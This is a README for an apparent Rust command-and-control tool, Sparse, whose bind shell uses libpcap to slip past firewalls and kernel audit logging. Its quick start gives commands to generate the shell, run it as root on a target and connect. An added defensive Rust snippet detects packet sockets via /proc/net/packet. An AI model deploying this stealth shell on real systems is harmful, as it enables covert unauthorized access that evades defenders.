# Sparse: A Rust C2 framework
Developed using libpcap to evade local firewalls, with an eye towards hiding itself from inspection. Deprecated in favor of sparse-v2 before being completely developed; the most significant tool this repository contributes is `sparse-05`.

This repository weaponizes some of the concepts highlighted in [this blog post](https://andrew.riouxs.co/articles/20251017-direct-network-access.html).

## Significant Packages
- [pcap-sys](./pcap-sys): A Rust wrapper around the libpcap library for Linux
- [nl-sys](./nl-sys): A Rust wrapper around the netlink (nl) library on Linux
- [sparse-05](./sparse-05/README.md): A bind shell utility to create bind shells on target servers and connect to them

## Development
This project is designed to be developed inside a Nix developer shell, obtained with `nix develop`.

## Bind shell
The most mature implementation of Sparse is the version 0.5 bind shell, which is documented in [its own folder](./sparse-05/README.md).

### Quick start:
- Install the Nix package manager on a Linux system: <https://nixos.org/download/>
- Run `nix --experimental-features 'nix-command flakes' build .#sparse-05-client`
- Generate a Linux server with `result/bin/sparse-05-client generate -t linux service-name`
- Copy to and run on a target system as root
- Connect to it with `result/bin/sparse-05-client connect service-name.scon SERVER_IP:54248`
- Set up a firewall to block all inbound connections with `iptables -P INPUT DROP`, `iptables -F INPUT`; sparse should still be able to connect and operate
- Run `iptstate`, `auditbeat`, or `auditd` from another session to see that no IP or UDP traffic is being logged by the kernel
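
The last two steps show that netfilter-based tooling does not see this traffic. libpcap on Linux captures through `AF_PACKET` sockets, so the kernel's packet-socket table is one place a defender can look instead. The following is an added example, not code from this repository: it parses `/proc/net/packet` and resolves each socket inode to the PIDs holding it. The function names and the sample table are constructed for illustration.

```rust
use std::fs;

/// One row of /proc/net/packet: an open AF_PACKET socket.
#[derive(Debug, PartialEq)]
pub struct PacketSock { pub sock_type: u32, pub proto: u16, pub ifindex: u32, pub inode: u64 }

/// Parse /proc/net/packet text (columns: sk RefCnt Type Proto Iface R Rmem User Inode).
pub fn parse_packet_table(text: &str) -> Vec<PacketSock> {
    text.lines()
        .skip(1) // header row
        .filter_map(|line| {
            let f: Vec<&str> = line.split_whitespace().collect();
            if f.len() < 9 { return None; } // skip malformed or truncated rows
            Some(PacketSock {
                sock_type: f[2].parse().ok()?,              // 3 = SOCK_RAW, 2 = SOCK_DGRAM
                proto: u16::from_str_radix(f[3], 16).ok()?, // Proto column is hex
                ifindex: f[4].parse().ok()?,
                inode: f[8].parse().ok()?,
            })
        })
        .collect()
}

/// PIDs holding a descriptor for the socket inode (root is needed to read other users' fds).
pub fn pids_for_inode(inode: u64) -> Vec<u32> {
    let want = format!("socket:[{}]", inode);
    let mut pids = Vec::new();
    for entry in fs::read_dir("/proc").into_iter().flatten().flatten() {
        let Some(pid) = entry.file_name().to_str().and_then(|s| s.parse::<u32>().ok()) else { continue };
        let fds = fs::read_dir(entry.path().join("fd")).into_iter().flatten().flatten();
        if fds.filter_map(|fd| fs::read_link(fd.path()).ok()).any(|t| t.to_string_lossy() == want) {
            pids.push(pid);
        }
    }
    pids
}

// Constructed sample table, not captured from a real host.
pub const SAMPLE: &str = "sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n\
ffff9a0b12345000 3      3    0003   2     1 0      0      48211\n\
ffff9a0b12346000 3      2    88cc   2     1 0      101    30120\n";

fn main() {
    let text = fs::read_to_string("/proc/net/packet").unwrap_or_else(|_| SAMPLE.to_string());
    for s in parse_packet_table(&text) {
        let note = if s.proto == 0x0003 { "ETH_P_ALL (sees every frame)" } else { "" };
        println!("inode={} type={} proto={:#06x} {} pids={:?}", s.inode, s.sock_type, s.proto, note, pids_for_inode(s.inode));
    }
}
```

Ordinary software such as DHCP clients and packet sniffers also holds packet sockets, so treat the output as a triage list to compare against the processes expected on the host.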